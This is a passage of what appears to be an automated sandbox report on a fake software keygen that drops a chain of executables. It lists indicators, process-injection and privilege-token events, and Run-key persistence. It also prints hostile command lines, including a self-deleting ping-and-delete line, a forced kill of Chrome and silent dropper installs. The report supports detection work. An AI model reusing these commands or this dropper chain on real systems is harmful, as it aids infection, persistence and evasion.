7145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 1900000001000000100000001f7e750b566b128ac0b8d6576d2a70a503000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e1d0000000100000010000000e3f9af952c6df2aaa41706a77a44c2031400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f76200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e0b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b002000430041000000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df12000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c	app.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

5440 PING.EXE
3896 PING.EXE
4764 PING.EXE

pid	process
5440	PING.EXE
3896	PING.EXE
4764	PING.EXE

Script User-Agent 12 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	87	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	155	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	87494	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	106	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	87190	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	87192	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	87281	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	87490	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	84	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	85	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	100	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	90035	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

file.exeEA85.tmp.exemultitimer.exe

pid	process
188	file.exe
188	file.exe
4060	EA85.tmp.exe
4060	EA85.tmp.exe
188	file.exe
188	file.exe
188	file.exe
188	file.exe
188	file.exe
188	file.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe
2468	multitimer.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

explorer.exe

pid process

7280 explorer.exe
2092
Suspicious behavior: LoadsDriver 3 IoCs

Processes:

app.exe

pid process

5892 app.exe
624
624

pid	process
7280	explorer.exe
2092

pid	process
5892	app.exe
624
624

Suspicious behavior: MapViewOfSection 64 IoCs

Processes:

MicrosoftEdgeCP.exe74qACLReRlGN.exeexplorer.exeexplorer.exeexplorer.exe

pid	process
504	MicrosoftEdgeCP.exe
504	MicrosoftEdgeCP.exe
6556	74qACLReRlGN.exe
504	MicrosoftEdgeCP.exe
504	MicrosoftEdgeCP.exe
504	MicrosoftEdgeCP.exe
504	MicrosoftEdgeCP.exe
2092
2092
2092
2092
2092
2092
2092
2092
5732	explorer.exe
5732	explorer.exe
5732	explorer.exe
5732	explorer.exe
5732	explorer.exe
5732	explorer.exe
5732	explorer.exe
5732	explorer.exe
5732	explorer.exe
5732	explorer.exe
2092
2092
2092
2092
5520	explorer.exe
5520	explorer.exe
5520	explorer.exe
5520	explorer.exe
5520	explorer.exe
5520	explorer.exe
5520	explorer.exe
5520	explorer.exe
5520	explorer.exe
5520	explorer.exe
2092
2092
2092
2092
6136	explorer.exe
6136	explorer.exe
6136	explorer.exe
6136	explorer.exe
6136	explorer.exe
6136	explorer.exe
6136	explorer.exe
6136	explorer.exe
6136	explorer.exe
6136	explorer.exe
2092
2092
5520	explorer.exe
5520	explorer.exe
5732	explorer.exe
5732	explorer.exe
6136	explorer.exe
6136	explorer.exe
5520	explorer.exe
5520	explorer.exe
5520	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Setup.exemultitimer.exefile.exemultitimer.exevcghl0vi0hv.exevpn.tmpzv3ykprswya.exetaskkill.exepowershell.exetaskkill.exe8CEH4UI8M.exeMicrosoftEdge.exeMicrosoftEdgeCP.exemd2_2efs.exe7za.exeMicrosoftEdgeCP.exeapp.exeFkIw5o3KqG0E.exeWerFault.exeRegAsm.exeRegAsm.exeeSlZAnMoMNVf.exe7za.exeWerFault.exet3inZRCqsjdW.exeWerFault.exetaskkill.exetaskkill.exemultitimer.exemultitimer.exemultitimer.exemultitimer.exe

description	pid	process
Token: SeDebugPrivilege	3772	Setup.exe
Token: SeDebugPrivilege	1232	multitimer.exe
Token: SeDebugPrivilege	188	file.exe
Token: SeDebugPrivilege	2468	multitimer.exe
Token: SeDebugPrivilege	196	vcghl0vi0hv.exe
Token: SeDebugPrivilege	184	vpn.tmp
Token: SeDebugPrivilege	2388	zv3ykprswya.exe
Token: SeDebugPrivilege	184	vpn.tmp
Token: SeDebugPrivilege	4776	taskkill.exe
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeDebugPrivilege	4372	taskkill.exe
Token: SeDebugPrivilege	372	8CEH4UI8M.exe
Token: SeDebugPrivilege	2464	MicrosoftEdge.exe
Token: SeDebugPrivilege	2464	MicrosoftEdge.exe
Token: SeDebugPrivilege	2464	MicrosoftEdge.exe
Token: SeDebugPrivilege	2464	MicrosoftEdge.exe
Token: SeDebugPrivilege	4184	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4184	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4184	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4184	MicrosoftEdgeCP.exe
Token: SeManageVolumePrivilege	3808	md2_2efs.exe
Token: SeRestorePrivilege	5624	7za.exe
Token: 35	5624	7za.exe
Token: SeSecurityPrivilege	5624	7za.exe
Token: SeSecurityPrivilege	5624	7za.exe
Token: SeDebugPrivilege	5860	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	5860	MicrosoftEdgeCP.exe
Token: SeSystemEnvironmentPrivilege	5892	app.exe
Token: SeDebugPrivilege	5892	app.exe
Token: SeLoadDriverPrivilege	5892	app.exe
Token: SeDebugPrivilege	6000	FkIw5o3KqG0E.exe
Token: SeRestorePrivilege	5240	WerFault.exe
Token: SeBackupPrivilege	5240	WerFault.exe
Token: SeBackupPrivilege	5240	WerFault.exe
Token: SeDebugPrivilege	4196	RegAsm.exe
Token: SeDebugPrivilege	4884	RegAsm.exe
Token: SeDebugPrivilege	5240	WerFault.exe
Token: SeDebugPrivilege	5452	eSlZAnMoMNVf.exe
Token: SeRestorePrivilege	5372	7za.exe
Token: 35	5372	7za.exe
Token: SeDebugPrivilege	6044	WerFault.exe
Token: SeDebugPrivilege	1240	t3inZRCqsjdW.exe
Token: SeDebugPrivilege	5024	WerFault.exe
Token: SeSecurityPrivilege	5372	7za.exe
Token: SeSecurityPrivilege	5372	7za.exe
Token: SeDebugPrivilege	7016	taskkill.exe
Token: SeDebugPrivilege	7128	taskkill.exe
Token: SeDebugPrivilege	6824	multitimer.exe
Token: SeDebugPrivilege	7004	multitimer.exe
Token: SeShutdownPrivilege	2092
Token: SeCreatePagefilePrivilege	2092
Token: SeDebugPrivilege	6148	multitimer.exe
Token: SeDebugPrivilege	5904	multitimer.exe
Token: SeManageVolumePrivilege	3808	md2_2efs.exe
Token: SeShutdownPrivilege	2092
Token: SeCreatePagefilePrivilege	2092
Token: SeShutdownPrivilege	2092
Token: SeCreatePagefilePrivilege	2092
Token: SeShutdownPrivilege	2092
Token: SeCreatePagefilePrivilege	2092
Token: SeShutdownPrivilege	2092
Token: SeCreatePagefilePrivilege	2092
Token: SeShutdownPrivilege	2092
Token: SeCreatePagefilePrivilege	2092

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

Setup3310.tmpokp5sltpt3j.tmpvict.tmpIBInstaller_97039.tmpvpn.tmp

pid	process
4172	Setup3310.tmp
1232	okp5sltpt3j.tmp
2936	vict.tmp
4440	IBInstaller_97039.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp
184	vpn.tmp

Suspicious use of SetWindowsHookEx 64 IoCs

Processes:

askinstall24.exeokp5sltpt3j.exevict.exeokp5sltpt3j.tmpvpn.exevpn.tmpvict.tmpSetup3310.exeSetup3310.tmpIBInstaller_97039.exef3y1k5c5r3s.exeIBInstaller_97039.tmpf3y1k5c5r3s.tmpwinlthst.exeapp.exewimapi.exechrome_proxy.exeSetup.exeSetup.tmpMicrosoftEdge.exeFlP6LqyXbTDa.tmpMicrosoftEdgeCP.exe7za.exeRegAsm.exeRegAsm.exeRegAsm.exeRegAsm.exeRegAsm.exeP0iVUVC5LXsJ.exeYsU5j51khm0T.exeRegAsm.exeFlP6LqyXbTDa.exe7za.exeRegAsm.exevsVXhkLl7qyX.exeRegAsm.exetapinstall.exemask_svc.exemask_svc.exe141B.tmp.exeMaskVPNUpdate.exeexplorer.exevict.exeaskinstall24.exevict.tmpSetup3310.exeSetup3310.tmpwimapi.exeSetup.exeSetup.tmpRegAsm.exeRegAsm.exeRegAsm.exeRegAsm.exeRegAsm.exe1AKMrCbJ3J6D.exeiGO0cC4S3kj3.exeRegAsm.exesl9UJySjtNxC.exeiGO0cC4S3kj3.tmpRegAsm.exeRegAsm.exe

pid	process
2196	askinstall24.exe
3448	okp5sltpt3j.exe
4000	vict.exe
1232	okp5sltpt3j.tmp
4036	vpn.exe
184	vpn.tmp
2936	vict.tmp
860	Setup3310.exe
4172	Setup3310.tmp
4268	IBInstaller_97039.exe
4416	f3y1k5c5r3s.exe
4440	IBInstaller_97039.tmp
4508	f3y1k5c5r3s.tmp
4540	winlthst.exe
4568	app.exe
4640	wimapi.exe
4796	chrome_proxy.exe
4488	Setup.exe
3812	Setup.tmp
2464	MicrosoftEdge.exe
4248	FlP6LqyXbTDa.tmp
504	MicrosoftEdgeCP.exe
504	MicrosoftEdgeCP.exe
5624	7za.exe
416	RegAsm.exe
4884	RegAsm.exe
4196	RegAsm.exe
5344	RegAsm.exe
5364	RegAsm.exe
4992	P0iVUVC5LXsJ.exe
5548	YsU5j51khm0T.exe
4804	RegAsm.exe
5632	FlP6LqyXbTDa.exe
5372	7za.exe
6116	RegAsm.exe
4248	FlP6LqyXbTDa.tmp
5720	vsVXhkLl7qyX.exe
6572	RegAsm.exe
6636	tapinstall.exe
7092	mask_svc.exe
5900	mask_svc.exe
5748	141B.tmp.exe
4212	MaskVPNUpdate.exe
7280	explorer.exe
8696	vict.exe
7976	askinstall24.exe
3920	vict.tmp
4736	Setup3310.exe
10080	Setup3310.tmp
7516	wimapi.exe
8104	Setup.exe
6372	Setup.tmp
5984	RegAsm.exe
5708	RegAsm.exe
9916	RegAsm.exe
3232	RegAsm.exe
5432	RegAsm.exe
7232	1AKMrCbJ3J6D.exe
10300	iGO0cC4S3kj3.exe
10332	RegAsm.exe
10352	sl9UJySjtNxC.exe
10428	iGO0cC4S3kj3.tmp
10804	RegAsm.exe
10828	RegAsm.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Diskgetor.Data.Recovery.3.58.key.generator.execmd.exekeygen-step-4.exekeygen-pr.exekey.exekeygen-step-3.execmd.exeSetup.exefile.exeEA85.tmp.exemultitimer.exemultitimer.exemultitimer.exe

description	pid	process	target process
PID 3884 wrote to memory of 1176	3884	Diskgetor.Data.Recovery.3.58.key.generator.exe	cmd.exe
PID 3884 wrote to memory of 1176	3884	Diskgetor.Data.Recovery.3.58.key.generator.exe	cmd.exe
PID 3884 wrote to memory of 1176	3884	Diskgetor.Data.Recovery.3.58.key.generator.exe	cmd.exe
PID 1176 wrote to memory of 3748	1176	cmd.exe	keygen-pr.exe
PID 1176 wrote to memory of 3748	1176	cmd.exe	keygen-pr.exe
PID 1176 wrote to memory of 3748	1176	cmd.exe	keygen-pr.exe
PID 1176 wrote to memory of 4084	1176	cmd.exe	keygen-step-1.exe
PID 1176 wrote to memory of 4084	1176	cmd.exe	keygen-step-1.exe
PID 1176 wrote to memory of 4084	1176	cmd.exe	keygen-step-1.exe
PID 1176 wrote to memory of 1312	1176	cmd.exe	keygen-step-3.exe
PID 1176 wrote to memory of 1312	1176	cmd.exe	keygen-step-3.exe
PID 1176 wrote to memory of 1312	1176	cmd.exe	keygen-step-3.exe
PID 1176 wrote to memory of 2052	1176	cmd.exe	keygen-step-4.exe
PID 1176 wrote to memory of 2052	1176	cmd.exe	keygen-step-4.exe
PID 1176 wrote to memory of 2052	1176	cmd.exe	keygen-step-4.exe
PID 2052 wrote to memory of 3772	2052	keygen-step-4.exe	Setup.exe
PID 2052 wrote to memory of 3772	2052	keygen-step-4.exe	Setup.exe
PID 3748 wrote to memory of 2512	3748	keygen-pr.exe	key.exe
PID 3748 wrote to memory of 2512	3748	keygen-pr.exe	key.exe
PID 3748 wrote to memory of 2512	3748	keygen-pr.exe	key.exe
PID 2512 wrote to memory of 3640	2512	key.exe	key.exe
PID 2512 wrote to memory of 3640	2512	key.exe	key.exe
PID 2512 wrote to memory of 3640	2512	key.exe	key.exe
PID 1312 wrote to memory of 648	1312	keygen-step-3.exe	cmd.exe
PID 1312 wrote to memory of 648	1312	keygen-step-3.exe	cmd.exe
PID 1312 wrote to memory of 648	1312	keygen-step-3.exe	cmd.exe
PID 648 wrote to memory of 3896	648	cmd.exe	PING.EXE
PID 648 wrote to memory of 3896	648	cmd.exe	PING.EXE
PID 648 wrote to memory of 3896	648	cmd.exe	PING.EXE
PID 3772 wrote to memory of 1232	3772	Setup.exe	multitimer.exe
PID 3772 wrote to memory of 1232	3772	Setup.exe	multitimer.exe
PID 2052 wrote to memory of 188	2052	keygen-step-4.exe	file.exe
PID 2052 wrote to memory of 188	2052	keygen-step-4.exe	file.exe
PID 2052 wrote to memory of 188	2052	keygen-step-4.exe	file.exe
PID 188 wrote to memory of 3956	188	file.exe	EA85.tmp.exe
PID 188 wrote to memory of 3956	188	file.exe	EA85.tmp.exe
PID 188 wrote to memory of 3956	188	file.exe	EA85.tmp.exe
PID 3956 wrote to memory of 4060	3956	EA85.tmp.exe	EA85.tmp.exe
PID 3956 wrote to memory of 4060	3956	EA85.tmp.exe	EA85.tmp.exe
PID 3956 wrote to memory of 4060	3956	EA85.tmp.exe	EA85.tmp.exe
PID 3956 wrote to memory of 4060	3956	EA85.tmp.exe	EA85.tmp.exe
PID 3956 wrote to memory of 4060	3956	EA85.tmp.exe	EA85.tmp.exe
PID 3956 wrote to memory of 4060	3956	EA85.tmp.exe	EA85.tmp.exe
PID 3956 wrote to memory of 4060	3956	EA85.tmp.exe	EA85.tmp.exe
PID 3956 wrote to memory of 4060	3956	EA85.tmp.exe	EA85.tmp.exe
PID 3956 wrote to memory of 4060	3956	EA85.tmp.exe	EA85.tmp.exe
PID 3956 wrote to memory of 4060	3956	EA85.tmp.exe	EA85.tmp.exe
PID 3956 wrote to memory of 4060	3956	EA85.tmp.exe	EA85.tmp.exe
PID 3956 wrote to memory of 4060	3956	EA85.tmp.exe	EA85.tmp.exe
PID 3956 wrote to memory of 4060	3956	EA85.tmp.exe	EA85.tmp.exe
PID 1232 wrote to memory of 3488	1232	multitimer.exe	multitimer.exe
PID 1232 wrote to memory of 3488	1232	multitimer.exe	multitimer.exe
PID 3488 wrote to memory of 2468	3488	multitimer.exe	multitimer.exe
PID 3488 wrote to memory of 2468	3488	multitimer.exe	multitimer.exe
PID 2468 wrote to memory of 196	2468	multitimer.exe	vcghl0vi0hv.exe
PID 2468 wrote to memory of 196	2468	multitimer.exe	vcghl0vi0hv.exe
PID 2468 wrote to memory of 2388	2468	multitimer.exe	zv3ykprswya.exe
PID 2468 wrote to memory of 2388	2468	multitimer.exe	zv3ykprswya.exe
PID 2468 wrote to memory of 2196	2468	multitimer.exe	askinstall24.exe
PID 2468 wrote to memory of 2196	2468	multitimer.exe	askinstall24.exe
PID 2468 wrote to memory of 2196	2468	multitimer.exe	askinstall24.exe
PID 2468 wrote to memory of 3448	2468	multitimer.exe	okp5sltpt3j.exe
PID 2468 wrote to memory of 3448	2468	multitimer.exe	okp5sltpt3j.exe
PID 2468 wrote to memory of 3448	2468	multitimer.exe	okp5sltpt3j.exe

C:\Users\Admin\AppData\Local\Temp\Diskgetor.Data.Recovery.3.58.key.generator.exe
"C:\Users\Admin\AppData\Local\Temp\Diskgetor.Data.Recovery.3.58.key.generator.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3884

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1176

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3748

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2512

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:3640

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:4084

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1312

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:648

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:3896

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2052

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3772

C:\Users\Admin\AppData\Local\Temp\IF5YHLUPB1\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\IF5YHLUPB1\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1232

C:\Users\Admin\AppData\Local\Temp\IF5YHLUPB1\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\IF5YHLUPB1\multitimer.exe" 1 3.1615557347.604b72e357f9e 101
6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3488

C:\Users\Admin\AppData\Local\Temp\IF5YHLUPB1\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\IF5YHLUPB1\multitimer.exe" 2 3.1615557347.604b72e357f9e
7⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2468

C:\Users\Admin\AppData\Local\Temp\umo4jtmwpko\vcghl0vi0hv.exe
"C:\Users\Admin\AppData\Local\Temp\umo4jtmwpko\vcghl0vi0hv.exe" testparams
8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:196

C:\Users\Admin\AppData\Roaming\wvs5xnmrrl4\f3y1k5c5r3s.exe
"C:\Users\Admin\AppData\Roaming\wvs5xnmrrl4\f3y1k5c5r3s.exe" /VERYSILENT /p=testparams
9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4416

C:\Users\Admin\AppData\Local\Temp\is-HE13J.tmp\f3y1k5c5r3s.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HE13J.tmp\f3y1k5c5r3s.tmp" /SL5="$1037A,289736,88576,C:\Users\Admin\AppData\Roaming\wvs5xnmrrl4\f3y1k5c5r3s.exe" /VERYSILENT /p=testparams
10⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4508

C:\Users\Admin\AppData\Local\Temp\zicluqddg1x\zv3ykprswya.exe
"C:\Users\Admin\AppData\Local\Temp\zicluqddg1x\zv3ykprswya.exe" 57a764d042bf8
8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:2388

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k "C:\Program Files\8CEH4UI8MA\8CEH4UI8M.exe" 57a764d042bf8 & exit
9⤵
PID:4600

C:\Program Files\8CEH4UI8MA\8CEH4UI8M.exe
"C:\Program Files\8CEH4UI8MA\8CEH4UI8M.exe" 57a764d042bf8
10⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:372

C:\Users\Admin\AppData\Local\Temp\ft3ysu1f1l4\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\ft3ysu1f1l4\askinstall24.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2196

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:4104

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4776

C:\Users\Admin\AppData\Local\Temp\ixecpm0hymi\okp5sltpt3j.exe
"C:\Users\Admin\AppData\Local\Temp\ixecpm0hymi\okp5sltpt3j.exe" /VERYSILENT
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3448

C:\Users\Admin\AppData\Local\Temp\is-AT2C0.tmp\okp5sltpt3j.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AT2C0.tmp\okp5sltpt3j.tmp" /SL5="$A0064,870426,780800,C:\Users\Admin\AppData\Local\Temp\ixecpm0hymi\okp5sltpt3j.exe" /VERYSILENT
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
